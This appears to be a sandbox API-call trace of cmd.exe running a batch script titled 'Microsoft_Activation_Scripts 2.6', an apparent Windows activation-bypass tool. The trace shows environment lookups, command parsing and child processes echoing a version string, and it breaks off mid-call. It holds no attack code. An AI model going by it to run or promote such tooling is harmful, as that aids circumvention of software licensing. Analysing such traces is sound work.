_wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0178.927] GetProcessHeap () returned 0x19a8f1e0000 [0178.928] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efc10) returned 1 [0178.928] GetProcessHeap () returned 0x19a8f1e0000 [0178.928] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecca0 [0178.928] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.928] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\find.exe", lpCommandLine="find \"127.69\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe4c0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find \"127.69\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe4a8 | out: lpCommandLine="find \"127.69\" ", lpProcessInformation=0x43f9efe4a8*(hProcess=0x9c, hThread=0xac, dwProcessId=0xd60, dwThreadId=0xe50)) returned 1 [0178.935] CloseHandle (hObject=0xac) returned 1 [0178.935] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.935] GetProcessHeap () returned 0x19a8f1e0000 [0178.936] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0178.937] GetEnvironmentStringsW () returned 0x19a8f206860* [0178.937] GetProcessHeap () returned 0x19a8f1e0000 [0178.937] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f215dc0 [0178.937] memcpy (in: _Dst=0x19a8f215dc0, _Src=0x19a8f206860, _Size=0xfbe | out: _Dst=0x19a8f215dc0) returned 0x19a8f215dc0 [0178.937] FreeEnvironmentStringsA (penv="=") returned 1 [0178.937] GetProcessHeap () returned 0x19a8f1e0000 [0178.937] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecca0) returned 1 [0178.937] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe5a0 | out: lpAttributeList=0x43f9efe5a0) [0178.937] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0178.937] _close (_FileHandle=3) returned 0 [0178.937] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0178.937] _close (_FileHandle=4) returned 0 [0178.937] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0179.078] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x43f9efe928 | out: lpExitCode=0x43f9efe928*=0x0) returned 1 [0179.078] CloseHandle (hObject=0x98) returned 1 [0179.078] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0179.086] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x43f9efe928 | out: lpExitCode=0x43f9efe928*=0x0) returned 1 [0179.087] CloseHandle (hObject=0x9c) returned 1 [0179.087] GetProcessHeap () returned 0x19a8f1e0000 [0179.087] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f91d0 [0179.087] _pipe (in: _PtHandles=0x19a8f1f91e0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x19a8f1f91e0) returned 0 [0179.087] _dup (_FileHandle=1) returned 5 [0179.087] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0179.087] _close (_FileHandle=4) returned 0 [0179.087] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0179.087] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0179.087] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0179.087] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0179.087] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0179.087] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0179.087] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0179.087] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0179.088] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0179.088] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0179.088] GetProcessHeap () returned 0x19a8f1e0000 [0179.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.088] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0179.088] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0179.088] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0179.088] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0179.088] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0179.088] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0179.088] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0179.088] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0179.088] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0179.088] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0179.088] GetProcessHeap () returned 0x19a8f1e0000 [0179.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0179.088] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0179.088] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1efeb0 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20bc10 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x86) returned 0x19a8f1e5e10 [0179.089] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f2011a0 [0179.089] SetErrorMode (uMode=0x0) returned 0x0 [0179.089] SetErrorMode (uMode=0x1) returned 0x0 [0179.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x19a8f2011b0, lpFilePart=0x43f9efe280 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efe280*="system32") returned 0x13 [0179.089] SetErrorMode (uMode=0x0) returned 0x1 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f2011a0, Size=0x48) returned 0x19a8f2011a0 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f2011a0) returned 0x48 [0179.089] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3e) returned 0x19a8f1f9090 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x68) returned 0x19a8f1ead50 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ead50, Size=0x3e) returned 0x19a8f1ead50 [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ead50) returned 0x3e [0179.089] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0179.089] GetProcessHeap () returned 0x19a8f1e0000 [0179.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1e5ea0 [0179.090] GetProcessHeap () returned 0x19a8f1e0000 [0179.090] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5ea0, Size=0x88) returned 0x19a8f1e5ea0 [0179.090] GetProcessHeap () returned 0x19a8f1e0000 [0179.090] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5ea0) returned 0x88 [0179.090] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.090] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe000) returned 0x19a8f1f8b20 [0179.090] FindClose (in: hFindFile=0x19a8f1f8b20 | out: hFindFile=0x19a8f1f8b20) returned 1 [0179.090] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0179.090] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0179.090] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe560, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.090] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe480, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe380 | out: lpAttributeList=0x43f9efe480, lpSize=0x43f9efe380) returned 1 [0179.090] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe480, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe36c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe480, lpPreviousValue=0x0) returned 1 [0179.091] GetStartupInfoW (in: lpStartupInfo=0x43f9efe410 | out: lpStartupInfo=0x43f9efe410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0179.091] GetProcessHeap () returned 0x19a8f1e0000 [0179.091] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1efe20 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0179.091] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0179.092] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0179.093] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0179.093] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0179.093] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0179.093] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0179.093] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0179.093] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0179.093] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0179.093] GetProcessHeap () returned 0x19a8f1e0000 [0179.094] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efe20) returned 1 [0179.094] GetProcessHeap () returned 0x19a8f1e0000 [0179.094] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ec780 [0179.094] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.094] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe3a0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe388 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"", lpProcessInformation=0x43f9efe388*(hProcess=0x90, hThread=0x98, dwProcessId=0xe74, dwThreadId=0x668)) returned 1 [0179.103] CloseHandle (hObject=0x98) returned 1 [0179.103] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0179.103] GetProcessHeap () returned 0x19a8f1e0000 [0179.104] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f215dc0) returned 1 [0179.104] GetEnvironmentStringsW () returned 0x19a8f215dc0* [0179.105] GetProcessHeap () returned 0x19a8f1e0000 [0179.105] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f206860 [0179.105] memcpy (in: _Dst=0x19a8f206860, _Src=0x19a8f215dc0, _Size=0xfbe | out: _Dst=0x19a8f206860) returned 0x19a8f206860 [0179.105] FreeEnvironmentStringsA (penv="=") returned 1 [0179.105] GetProcessHeap () returned 0x19a8f1e0000 [0179.105] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0179.105] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe480 | out: lpAttributeList=0x43f9efe480) [0179.105] _get_osfhandle (_FileHandle=3) returned 0x9c [0179.105] DuplicateHandle (in: hSourceProcessHandle=0x90, hSourceHandle=0x9c, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0179.105] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0179.105] _close (_FileHandle=5) returned 0 [0179.105] _dup (_FileHandle=0) returned 4 [0179.105] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0179.105] _close (_FileHandle=3) returned 0 [0179.105] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0179.105] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0179.105] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0179.105] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0179.105] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0179.105] _wcsicmp (_String1="find", _String2="CD") returned 3 [0179.106] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0179.106] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0179.106] _wcsicmp (_String1="find", _String2="REN") returned -12 [0179.106] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0179.106] _wcsicmp (_String1="find", _String2="SET") returned -13 [0179.106] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0179.106] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0179.106] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0179.106] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0179.106] _wcsicmp (_String1="find", _String2="MD") returned -7 [0179.106] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0179.106] _wcsicmp (_String1="find", _String2="RD") returned -12 [0179.106] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0179.106] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0179.106] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0179.106] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0179.106] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0179.106] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0179.106] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0179.106] _wcsicmp (_String1="find", _String2="VER") returned -16 [0179.106] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0179.106] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0179.106] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0179.106] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0179.106] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0179.106] _wcsicmp (_String1="find", _String2="START") returned -13 [0179.106] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0179.106] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0179.106] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0179.106] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0179.106] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0179.107] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0179.107] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0179.107] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0179.107] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0179.107] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0179.107] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0179.107] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0179.107] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0179.107] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0179.107] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0179.107] _wcsicmp (_String1="find", _String2="CD") returned 3 [0179.107] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0179.107] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0179.107] _wcsicmp (_String1="find", _String2="REN") returned -12 [0179.107] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0179.107] _wcsicmp (_String1="find", _String2="SET") returned -13 [0179.107] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0179.107] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0179.107] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0179.107] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0179.107] _wcsicmp (_String1="find", _String2="MD") returned -7 [0179.107] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0179.107] _wcsicmp (_String1="find", _String2="RD") returned -12 [0179.107] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0179.107] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0179.107] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0179.107] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0179.107] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0179.107] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0179.107] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0179.107] _wcsicmp (_String1="find", _String2="VER") returned -16 [0179.108] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0179.108] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0179.108] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0179.108] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0179.108] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0179.108] _wcsicmp (_String1="find", _String2="START") returned -13 [0179.108] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0179.108] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0179.108] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0179.108] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0179.108] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0179.108] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0179.108] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0179.108] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0179.108] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0179.108] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0179.108] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0179.108] _wcsicmp (_String1="find", _String2="IF") returned -3 [0179.108] _wcsicmp (_String1="find", _String2="REM") returned -12 [0179.108] GetProcessHeap () returned 0x19a8f1e0000 [0179.108] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f21adb0 [0179.109] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0179.109] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0179.109] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0179.109] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0179.109] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0179.109] _wcsicmp (_String1="find", _String2="CD") returned 3 [0179.109] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0179.109] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0179.109] _wcsicmp (_String1="find", _String2="REN") returned -12 [0179.109] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0179.109] _wcsicmp (_String1="find", _String2="SET") returned -13 [0179.109] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0179.109] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0179.109] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0179.109] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0179.109] _wcsicmp (_String1="find", _String2="MD") returned -7 [0179.109] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0179.109] _wcsicmp (_String1="find", _String2="RD") returned -12 [0179.109] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0179.109] _wcsicmp 